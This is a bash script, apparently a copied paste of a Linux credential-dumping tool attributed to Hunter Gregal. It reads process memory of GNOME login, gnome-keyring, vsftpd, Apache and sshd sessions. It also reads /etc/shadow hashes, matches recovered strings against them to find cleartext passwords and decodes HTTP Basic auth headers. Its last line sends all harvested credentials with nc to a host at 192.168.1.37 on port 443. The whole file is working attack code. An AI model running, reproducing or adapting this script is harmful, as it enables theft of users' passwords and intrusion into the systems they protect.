Capsh10

1. #!/bin/bash
2.  
3. # Author: Hunter Gregal
4. # Github: /huntergregal Twitter: /huntergregal Site: huntergregal.com
5. # Dumps & sends cleartext credentials from memory
6.  
7. #root check
8.  
9.  
10.  
11. if [[ "$EUID" -ne 0 ]]; then
12. echo "Root required - You are dumping memory..."
13. echo "Even mimikatz requires administrator"
14. exit 1
15. fi
16.  
17. #Store results to cleanup later
18. export RESULTS=""
19.  
20.  
21. # $1 = PID, $2 = output_file, $3 = operating system
22. function dump_pid () {
23.  
24. system=$3
25. pid=$1
26. output_file=$2
27. if [[ $system == "kali" ]]; then
28. mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | grep -E 'heap|stack' | cut -d' ' -f 1)
29. else
30. mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1)
31. fi
32. while read -r memrange; do
33. memrange_start=$(echo "$memrange" | cut -d"-" -f 1)
34. memrange_start=$(printf "%u\n" 0x"$memrange_start")
35. memrange_stop=$(echo "$memrange" | cut -d"-" -f 2)
36. memrange_stop=$(printf "%u\n" 0x"$memrange_stop")
37. memrange_size=$((memrange_stop - memrange_start))
38. dd if=/proc/"$pid"/mem of="${output_file}"."${pid}" ibs=1 oflag=append conv=notrunc \
39. skip="$memrange_start" count="$memrange_size" > /dev/null 2>&1
40. done <<< "$mem_maps"
41. }
42.  
43.  
44.  
45. # $1 = DUMP, $2 = HASH, $3 = SALT, $4 = SOURCE
46. function parse_pass () {
47.  
48. #If hash not in dump get shadow hashes
49. if [[ ! "$2" ]]; then
50. SHADOWHASHES="$(cut -d':' -f 2 /etc/shadow | grep -E '^\$.\$')"
51. fi
52.  
53. #Determine password potential for each word
54. while read -r line; do
55. #If hash in dump, prepare crypt line
56. if [[ "$2" ]]; then
57. #get ctype
58. CTYPE="$(echo "$2" | cut -c-3)"
59. #Escape quotes, backslashes, single quotes to pass into crypt
60. SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;')
61. CRYPT="\"$SAFE\", \"$CTYPE$3\""
62. if [[ $(python2 -c "import crypt; print crypt.crypt($CRYPT)") == "$2" ]]; then
63. #Find which user's password it is (useful if used more than once!)
64. USER="$(grep "${2}" /etc/shadow | cut -d':' -f 1)"
65. export RESULTS="$RESULTS$4 $USER:$line \n"
66. fi
67. #Else use shadow hashes
68. elif [[ $SHADOWHASHES ]]; then
69. while read -r thishash; do
70. CTYPE="$(echo "$thishash" | cut -c-3)"
71. SHADOWSALT="$(echo "$thishash" | cut -d'$' -f 3)"
72. #Escape quotes, backslashes, single quotes to pass into crypt
73. SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;')
74. CRYPT="\"$SAFE\", \"$CTYPE$SHADOWSALT\""
75. if [[ $(python2 -c "import crypt; print crypt.crypt($CRYPT)") == "$thishash" ]]; then
76. #Find which user's password it is (useful if used more than once!)
77. USER="$(grep "${thishash}" /etc/shadow | cut -d':' -f 1)"
78. export RESULTS="$RESULTS$4 $USER:$line\n"
79. fi
80. done <<< "$SHADOWHASHES"
81. #if no hash data - revert to checking probability
82. else
83. patterns=("^_pammodutil.+[0-9]$"\
84. "^LOGNAME="\
85. "UTF-8"\
86. "^splayManager[0-9]$"\
87. "^gkr_system_authtok$"\
88. "[0-9]{1,4}:[0-9]{1,4}:"\
89. "Manager\.Worker"\
90. "/usr/share"\
91. "/bin"\
92. "\.so\.[0-1]$"\
93. "x86_64"\
94. "(aoao)"\
95. "stuv")
96. export RESULTS="$RESULTS[HIGH]$4 $line\n"
97. for pattern in "${patterns[@]}"; do
98. if [[ $line =~ $pattern ]]; then
99. export RESULTS="$RESULTS[LOW]$4 $line\n"
100. fi
101. done
102. fi
103. done <<< "$1"
104. } # end parse_pass
105.  
106.  
107. #Support Kali
108. if [[ $(uname -a | awk '{print tolower($0)}') == *"kali"* ]]; then
109. SOURCE="[SYSTEM - GNOME]"
110. #get gdm-session-worker [pam/gdm-password] process
111. PID="$(ps -eo pid,command | sed -rn '/gdm-password\]/p' | awk -F ' ' '{ print $1 }')"
112. #if exists aka someone logged into gnome then extract...
113. if [[ $PID ]];then
114. while read -r pid; do
115. dump_pid "$pid" /tmp/dump "kali"
116. HASH="$(strings "/tmp/dump.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
117. SALT="$(echo "$HASH" | cut -d'$' -f 3)"
118. DUMP="$(strings "/tmp/dump.${pid}" | grep -E '^_pammodutil_getpwnam_root_1$' -B 5 -A 5)"
119. DUMP="${DUMP}$(strings "/tmp/dump.${pid}" | grep -E '^gkr_system_authtok$' -B 5 -A 5)"
120. #Remove dupes to speed up processing
121. DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
122. parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
123.  
124. #cleanup
125. rm -rf "/tmp/dump.${pid}"
126. done <<< "$PID"
127. fi
128. fi
129.  
130. #Support gnome-keyring
131. if [[ -n $(ps -eo pid,command | grep -v 'grep' | grep gnome-keyring) ]]; then
132.  
133. SOURCE="[SYSTEM - GNOME]"
134. #get /usr/bin/gnome-keyring-daemon process
135. PID="$(ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk -F ' ' '{ print $1 }')"
136.  
137. #if exists aka someone logged into gnome then extract...
138. if [[ $PID ]];then
139. while read -r pid; do
140. dump_pid "$pid" /tmp/dump
141. HASH="$(strings "/tmp/dump.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
142. SALT="$(echo "$HASH" | cut -d'$' -f 3)"
143. DUMP=$(strings "/tmp/dump.${pid}" | grep -E '^.+libgck\-1\.so\.0$' -B 10 -A 10)
144. DUMP+=$(strings "/tmp/dump.${pid}" | grep -E -A 5 -B 5 'libgcrypt\.so\..+$')
145. #Remove dupes to speed up processing
146. DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
147. parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
148. #cleanup
149. rm -rf "/tmp/dump.${pid}"
150. done <<< "$PID"
151. fi
152. fi
153.  
154. #Support VSFTPd - Active Users
155. if [[ -e "/etc/vsftpd.conf" ]]; then
156. SOURCE="[SYSTEM - VSFTPD]"
157. #get nobody /usr/sbin/vsftpd /etc/vsftpd.conf
158. PID="$(ps -eo pid,user,command | grep vsftpd | grep nobody | awk -F ' ' '{ print $1 }')"
159. #if exists aka someone logged into FTP then extract...
160. if [[ $PID ]];then
161. while read -r pid; do
162. dump_pid "$pid" /tmp/vsftpd
163. HASH="$(strings "/tmp/vsftpd.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
164. SALT="$(echo "$HASH" | cut -d'$' -f 3)"
165. DUMP=$(strings "/tmp/vsftpd.${pid}" | grep -E -B 5 -A 5 '^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$')
166. #Remove dupes to speed up processing
167. DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
168. parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
169. done <<< "$PID"
170.  
171. #cleanup
172. rm -rf /tmp/vsftpd*
173. fi
174. fi
175.  
176. #Support Apache2 - HTTP BASIC AUTH
177. if [[ -e "/etc/apache2/apache2.conf" ]]; then
178. SOURCE="[HTTP BASIC - APACHE2]"
179. #get all apache workers /usr/sbin/apache2 -k start
180. PID="$(ps -eo pid,user,command | grep apache2 | grep -v 'grep' | awk -F ' ' '{ print $1 }')"
181. #if exists aka apache2 running
182. if [[ "$PID" ]];then
183. #Dump all workers
184. while read -r pid; do
185. gcore -o /tmp/apache "$pid" > /dev/null 2>&1
186. #without gcore - VERY SLOW!
187. #dump_pid $pid /tmp/apache
188. done <<< "$PID"
189. #Get encoded creds
190. DUMP="$(strings /tmp/apache* | grep -E '^Authorization: Basic.+=$' | cut -d' ' -f 3)"
191. #for each extracted b64 - decode the cleartext
192. while read -r encoded; do
193. CREDS="$(echo "$encoded" | base64 -d)"
194. if [[ "$CREDS" ]]; then
195. export RESULTS="$RESULTS$SOURCE $CREDS\n"
196. fi
197. done <<< "$DUMP"
198. #cleanup
199. rm -rf /tmp/apache*
200. fi
201. fi
202.  
203. #Support sshd - Search active connections for Sudo passwords
204. if [[ -e "/etc/ssh/sshd_config" ]]; then
205. SOURCE="[SYSTEM - SSH]"
206. #get all ssh tty/pts sessions - sshd: user@pts01
207. PID="$(ps -eo pid,command | grep -E 'sshd:.+@' | grep -v 'grep' | awk -F ' ' '{ print $1 }')"
208. #if exists aka someone logged into SSH then dump
209. if [[ "$PID" ]];then
210. while read -r pid; do
211. dump_pid "$pid" /tmp/sshd
212. HASH="$(strings "/tmp/sshd.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
213. SALT="$(echo "$HASH" | cut -d'$' -f 3)"
214. DUMP=$(strings "/tmp/sshd.${pid}" | grep -E -A 3 '^sudo.+')
215. #Remove dupes to speed up processing
216. DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u)
217. parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
218. done <<< "$PID"
219. #cleanup
220. rm -rf /tmp/sshd.*
221. fi
222. fi
223.  
224. #Output results to STDOUT
225. printf "%b" "$RESULTS" | sort -u | nc 192.168.1.37 443
226. unset RESULTS